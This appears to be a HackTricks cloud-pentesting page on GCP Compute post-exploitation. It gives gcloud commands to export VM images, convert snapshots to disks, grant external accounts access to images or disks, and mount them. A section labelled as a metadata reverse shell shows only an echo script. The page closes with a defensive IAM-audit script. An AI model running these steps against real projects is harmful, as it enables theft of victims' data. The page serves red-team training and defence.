GCP - Compute Post Exploitation

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Compute

For more information about Compute and VPC (Networking), see:

GCP - Compute Enum

Export & Inspect Images locally

This allows an attacker to access the data contained inside already existing images, or to create new images of running VMs and access their data without having access to the running VM.

It's possible to export a VM image to a bucket and then download it and mount it on your own machine with the command:

Export and download VM image
```bash
gcloud compute images export --destination-uri gs://[BUCKET_NAME]/image.vmdk --image imagetest --export-format vmdk
# Then download the export from the bucket and mount it locally
```

Before performing this action the attacker might need privileges over the storage bucket and for sure privileges over cloudbuild, as it's the service that is going to be asked to perform the export.
Moreover, for this to work the cloudbuild SA and the compute SA need privileged permissions.
The cloudbuild SA <project-id>@cloudbuild.gserviceaccount.com needs:

  • roles/iam.serviceAccountTokenCreator
  • roles/compute.admin
  • roles/iam.serviceAccountUser

And the SA <project-id>-compute@developer.gserviceaccount.com needs:

  • roles/compute.storageAdmin
  • roles/storage.objectAdmin

Export & Inspect Snapshots & Disks locally

It's not possible to directly export snapshots and disks, but it's possible to transform a snapshot into a disk, a disk into an image and, following the previous section, export that image to inspect it locally.

<details>

<summary>Create disk from snapshot and image from disk</summary>

```bash
# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]

# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]
```

</details>

### Inspect an Image creating a VM

With the goal of accessing the **data stored in an image** or inside a **running VM** from which an attacker **has created an image,** it's possible to grant an external account access over the image:

<details>

<summary>Grant access to the image and create a VM</summary>

```bash
gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'
```

</details>

Then create a new VM from that image:

Create a VM instance from the image
```bash
gcloud compute instances create [INSTANCE_NAME] \
--project=[TARGET_PROJECT_ID] \
--zone=[ZONE] \
--image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]
```

If you can't give your external account access over the image, you could launch a VM using that image in the victim's project and make the metadata execute a reverse shell to access the image by adding the param:

Create VM with reverse shell in metadata
```bash
--metadata startup-script='#! /bin/bash
echo "hello"; '
```

Inspect a Snapshot/Disk attaching it to a VM

With the goal of accessing the data stored in a disk or a snapshot, you could transform the snapshot into a disk, a disk into an image and follow the previous steps.

Or you could grant an external account access over the disk (if the starting point is a snapshot, give access over the snapshot or create a disk from it):

Grant access to the disk
```bash
gcloud projects add-iam-policy-binding [PROJECT_ID] \
--member='user:[USER_EMAIL]' \
--role='roles/compute.storageAdmin'
```

Attach the disk to an instance:

Attach the disk to an instance
```bash
gcloud compute instances attach-disk [INSTANCE_NAME] \
--disk [DISK_NAME] \
--zone [ZONE]
```

Mount the disk inside the VM:

  1. SSH into the VM:
SSH into the VM and mount the disk
```bash
gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]
```
  2. Identify the Disk: Once inside the VM, identify the new disk by listing the disk devices. Typically, you can find it as /dev/sdb, /dev/sdc, etc.
  3. Format and Mount the Disk (if it's a new or raw disk):
  • Create a mount point:
Create mount point and mount
```bash
sudo mkdir -p /mnt/disks/[MOUNT_DIR]
```
  • Mount the disk:
Mount the disk device
```bash
sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]
```

If you cannot give an external project access to the snapshot or disk, you might need to perform these actions inside an instance in the same project as the snapshot/disk.
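
A defender's check for the grants described above, as an added example (not HackTricks' own code): it reads a project IAM policy and reports when the Cloud Build and Compute service accounts hold every role the image export needs, and when roles/compute.imageUser or roles/compute.storageAdmin is bound to a member outside your own domains. The sample policy, the `demo-proj` and `corp.example` names and the `trusted_domains` parameter are constructed for this example.

```python
# Roles the page lists as required for `gcloud compute images export`.
CLOUDBUILD_ROLES = {"roles/iam.serviceAccountTokenCreator",
                    "roles/compute.admin", "roles/iam.serviceAccountUser"}
COMPUTE_ROLES = {"roles/compute.storageAdmin", "roles/storage.objectAdmin"}
# Roles the page grants to an outside account to share an image or a disk.
SHARING_ROLES = {"roles/compute.imageUser", "roles/compute.storageAdmin"}

# Constructed sample, shaped like `gcloud projects get-iam-policy --format=json`.
CB = "serviceAccount:demo-proj@cloudbuild.gserviceaccount.com"
GCE = "serviceAccount:demo-proj-compute@developer.gserviceaccount.com"
SAMPLE_POLICY = {"bindings": [
    {"role": "roles/iam.serviceAccountTokenCreator", "members": [CB]},
    {"role": "roles/compute.admin", "members": [CB, "user:admin@corp.example"]},
    {"role": "roles/iam.serviceAccountUser", "members": [CB]},
    {"role": "roles/compute.storageAdmin",
     "members": [GCE, "user:someone@outside.example"]},
    {"role": "roles/compute.imageUser",
     "members": ["serviceAccount:vm@other-proj.iam.gserviceaccount.com",
                 "user:dev@corp.example"]},
]}


def roles_by_member(policy):
    """Invert the policy bindings into {member: set of roles}."""
    held = {}
    for binding in policy.get("bindings", []):
        for member in binding.get("members", []):
            held.setdefault(member, set()).add(binding["role"])
    return held


def audit_policy(policy, project_ref, trusted_domains):
    """Return sorted (finding, member, roles) tuples. project_ref is the prefix
    of the default service-account addresses (<project-id> on the page);
    trusted_domains (hypothetical) holds the domains the organisation owns."""
    held = roles_by_member(policy)
    cloudbuild = f"serviceAccount:{project_ref}@cloudbuild.gserviceaccount.com"
    compute = f"serviceAccount:{project_ref}-compute@developer.gserviceaccount.com"
    findings = []
    for sa, needed in ((cloudbuild, CLOUDBUILD_ROLES), (compute, COMPUTE_ROLES)):
        if needed <= held.get(sa, set()):  # every prerequisite role is present
            findings.append(("export-ready", sa, sorted(needed)))
    for member, roles in held.items():
        # Works for user:, serviceAccount:, group:, domain: and allUsers alike.
        domain = member.split(":", 1)[-1].rsplit("@", 1)[-1].lower()
        shared = roles & SHARING_ROLES
        if shared and member not in (cloudbuild, compute) and domain not in trusted_domains:
            findings.append(("external-share", member, sorted(shared)))
    return sorted(findings)
```

Feed it the parsed output of `gcloud projects get-iam-policy [PROJECT_ID] --format=json`; bindings made on an individual image or disk rather than on the project are not covered.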
